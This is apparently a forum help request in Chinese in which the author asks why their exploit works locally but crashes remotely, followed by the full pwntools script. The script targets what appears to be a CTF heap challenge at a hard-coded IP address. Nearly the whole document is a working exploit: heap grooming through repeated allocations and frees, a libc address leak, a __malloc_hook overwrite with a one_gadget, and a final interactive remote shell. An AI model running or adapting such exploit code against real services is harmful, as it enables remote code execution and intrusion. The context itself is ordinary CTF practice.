我自己写了一个 exploit，本地(ubuntu16.04)可以打通，但是远程总是报错：timeout: the monitored command dumped core
代码如下
from pwn import *
#context.log_level = 'debug'
#sh = process('./pwn')
# Module-level side effect: the connection is opened as soon as the script runs.
# Every helper below reads and writes this single global `sh` object; the
# commented-out `process(...)` line above is the local alternative.
sh = remote('111.231.70.44',28075)
def add(size, idx, content):
    """Drive menu option 1 on the global `sh` connection.

    Answers the size and index prompts with the decimal form of `size` and
    `idx`, then sends `content` raw (no trailing newline is appended).
    """
    menu_replies = (
        ('choice >> \n', '1'),
        ('Name of Size : ', str(size)),
        ('input index: ', str(idx)),
    )
    for prompt, reply in menu_replies:
        sh.recvuntil(prompt)
        sh.sendline(reply)
    sh.recvuntil('input flower name:\n')
    sh.send(content)
def remove(idx):
    """Drive menu option 2 on the global `sh` connection for slot `idx`."""
    menu_replies = (
        ('choice >> \n', '2'),
        ('input idx :', str(idx)),
    )
    for prompt, reply in menu_replies:
        sh.recvuntil(prompt)
        sh.sendline(reply)
def show(idx):
    """Drive menu option 3 on the global `sh` connection for slot `idx`.

    Only the request is sent; the caller is responsible for reading the reply.
    """
    menu_replies = (
        ('choice >> \n', '3'),
        ('idx : ', str(idx)),
    )
    for prompt, reply in menu_replies:
        sh.recvuntil(prompt)
        sh.sendline(reply)
def triger_consolidate(pay=''):
    """Answer the menu prompt with a 0x400-character string of '5'.

    `pay` is part of the signature but is never used in the body.
    """
    oversized_choice = '5' * 0x400
    sh.recvuntil('choice >> \n')
    sh.sendline(oversized_choice)
# Flat driver: every call below talks to the global `sh` connection through
# the add/remove/show/triger_consolidate helpers defined above. The sequence is
# strictly order-dependent, and all numeric constants (sizes, indices, the
# offsets subtracted/added to libcbase) are hard-coded for one specific
# binary/libc build — they are not derived from anything the service sends.
add(0x50, 0, 'a\n')
add(0x50, 1, 'a\n')
add(0x50, 2, 'a\n')
add(0x50, 3, 'a'*0x30 + p64(0x100))
add(0x50, 4, 'a\n')
add(0x50, 5, 'a\n')
remove(0)
remove(1)
remove(2)
remove(3)
triger_consolidate()
add(0x58, 0, 'a'*0x50 + p64(0))
add(0x40, 1, 'a\n')
add(0x40, 2, 'a')
add(0x30, 3, p64(0xdeadbeef))
remove(1)
remove(4)
triger_consolidate()
add(0x10, 5, 'a\n')
add(0x20, 5, 'a\n')
# Read slot 2 back and take the 6 bytes that follow 'flowers : ' as an address.
show(2)
sh.recvuntil('flowers : ')
# Pad the 6 bytes to 8 before unpacking; the subtracted value is a fixed
# offset that only holds for the libc build the script was written against.
libcbase = u64(sh.recv(6).ljust(8,'\x00')) - 0x3c4b61
log.success('libcbase: ' + hex(libcbase))
# Four candidate offsets; only one[0] is used below.
one = [0x4527a,0x45226,0xf0364,0xf1207]
system_addr = libcbase + 0x453a0  # not used anywhere in this script
onegadget = libcbase + one[0]
main_arena = libcbase + 0x3c4b30
free_hook = libcbase + 0x3c67a8  # not used anywhere in this script
malloc_hook = libcbase + 0x3c4b10
#realloc_hook = libcbase + 0x3c4b08
realloc = libcbase + 0x84710
remove(2)
remove(3)
add(0x50, 4, 'a'*0x10+p64(0) + p64(0x51) + p64(main_arena) )
add(0x40, 4, 'a\n')
add(0x50, 5, p64(0) + p64(0x41) + p64(0x51))
add(0x30, 5, 'a\n')
add(0x40, 5, 'a'*0x38 + p64(malloc_hook-0x18))
add(0x20, 5, p64(0xdeadbeef))
add(0x20, 5, p64(0xdeadbeef))
add(0x20, 5, p64(0xdeadbeef))
add(0x20, 5, p64(onegadget)+p64(realloc+0xc))
log.success('onegadget: ' + hex(onegadget))
#gdb.attach(sh)
# Final menu round done inline rather than via add(): only the size and index
# answers are sent — the script does not wait for the name prompt — before
# handing the connection to the user.
sh.recvuntil('choice >> \n')
sh.sendline('1')
sh.recvuntil('Name of Size : ')
sh.sendline(str(0x20))
sh.recvuntil('input index: ')
sh.sendline('5')
# add(0x40, 5, 'a\n')
sh.interactive()